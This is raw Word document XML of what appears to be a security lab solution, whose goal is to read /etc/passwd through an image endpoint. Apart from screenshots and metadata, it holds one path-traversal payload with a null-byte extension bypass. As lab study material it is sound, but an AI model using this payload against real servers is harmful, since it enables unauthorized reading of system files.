    <w:p w14:paraId="33BD34E6" w14:textId="7B4D6513" w:rsidR="0005195D" w:rsidRDefault="0005195D">
      <w:r>
        <w:t>Goal:</w:t>
      </w:r>
      <w:r w:rsidR="00012620" w:rsidRPr="00012620">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00012620" w:rsidRPr="00012620">
        <w:t>retrieve the contents of the /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00012620" w:rsidRPr="00012620">
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00012620" w:rsidRPr="00012620">
        <w:t>/passwd file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B943242" w14:textId="76FCC7DB" w:rsidR="0005195D" w:rsidRDefault="0005195D">
      <w:r>
        <w:t>Solution:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33802454" w14:textId="1EACF9CE" w:rsidR="00E33472" w:rsidRDefault="00E33472">
      <w:r>
        <w:t>1-</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03348E9E" w14:textId="191A6DA3" w:rsidR="00E33472" w:rsidRDefault="00E33472">
      <w:r w:rsidRPr="00E33472">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="25ECCC46" wp14:editId="1C40AAAB">
            <wp:extent cx="5943600" cy="3087370"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="908466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6623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8CDA" w14:textId="6F04FBD3" w:rsidR="00E33472" w:rsidRDefault="00120675">
      <w:r w:rsidRPr="00120675">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2D3DB55B" wp14:editId="2DFDC637">
            <wp:extent cx="5943600" cy="3064510"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="1883388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3886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F13B8" w14:textId="21767D97" w:rsidR="00120675" w:rsidRDefault="00120675">
      <w:r w:rsidRPr="00120675">
        <w:t>GET /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00120675">
        <w:t>image?filename</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00120675">
        <w:t>=/../../../</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00120675">
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00120675">
        <w:t>/passwd%00.jpg</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C10D103" w14:textId="40C1E699" w:rsidR="00120675" w:rsidRDefault="0012261C">
      <w:r w:rsidRPr="0012261C">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="69B851F9" wp14:editId="74296C9E">
            <wp:extent cx="5943600" cy="3141980"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:docPr id="908229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22996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067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7050"/>
    <w:rsid w:val="00012620"/>
    <w:rsid w:val="00033CF5"/>
    <w:rsid w:val="0005195D"/>
    <w:rsid w:val="00092505"/>
    <w:rsid w:val="00120675"/>
    <w:rsid w:val="0012261C"/>
    <w:rsid w:val="00137DFC"/>
    <w:rsid w:val="0016778B"/>
    <w:rsid w:val="00462E19"/>
    <w:rsid w:val="004759F8"/>
    <w:rsid w:val="004E7B67"/>
    <w:rsid w:val="005048BD"/>
    <w:rsid w:val="00561EC0"/>
    <w:rsid w:val="005875B3"/>
    <w:rsid w:val="005D039F"/>
    <w:rsid w:val="006D6F06"/>
    <w:rsid w:val="006E5A02"/>
    <w:rsid w:val="00706050"/>
    <w:rsid w:val="00711B56"/>
    <w:rsid w:val="00775A7B"/>
    <w:rsid w:val="008522B7"/>
    <w:rsid w:val="008738E5"/>
    <w:rsid w:val="008E7050"/>
    <w:rsid w:val="009F1759"/>
    <w:rsid w:val="00B120D5"/>
    <w:rsid w:val="00C23FCE"/>
    <w:rsid w:val="00C9158F"/>
    <w:rsid w:val="00CC2467"/>
    <w:rsid w:val="00D06E23"/>
    <w:rsid w:val="00D65D98"/>
    <w:rsid w:val="00E33472"/>
    <w:rsid w:val="00E45734"/>
    <w:rsid w:val="00EC4C78"/>
    <w:rsid w:val="00ED32D5"/>
    <w:rsid w:val="00EF0E3A"/>
    <w:rsid w:val="00F22746"/>
    <w:rsid w:val="00F4748C"/>
    <w:rsid w:val="00FA0DB0"/>
    <w:rsid w:val="00FD1A37"/>
    <w:rsid w:val="00FF68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2375AB"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{9EFA9DC5-3AE6-40AE-9683-4407B0420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E705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E705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E705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E705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E705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E705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E705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E705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E705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E705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E705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E705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E705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E705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E705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E705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E705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E705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E705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E705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E705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E705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E705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E705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E705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E705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E705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E705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E705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81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0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9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89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85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8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03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11</Pages>
  <Words>367</Words>
  <Characters>2092</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>17</Lines>
  <Paragraphs>4</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>2455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abdelrahman</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>nada abdelrahman</cp:lastModifiedBy>
  <cp:revision>39</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-08-25T16:44:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-08-25T17:53:00Z</dcterms:modified>
</cp:coreProperties>
</file>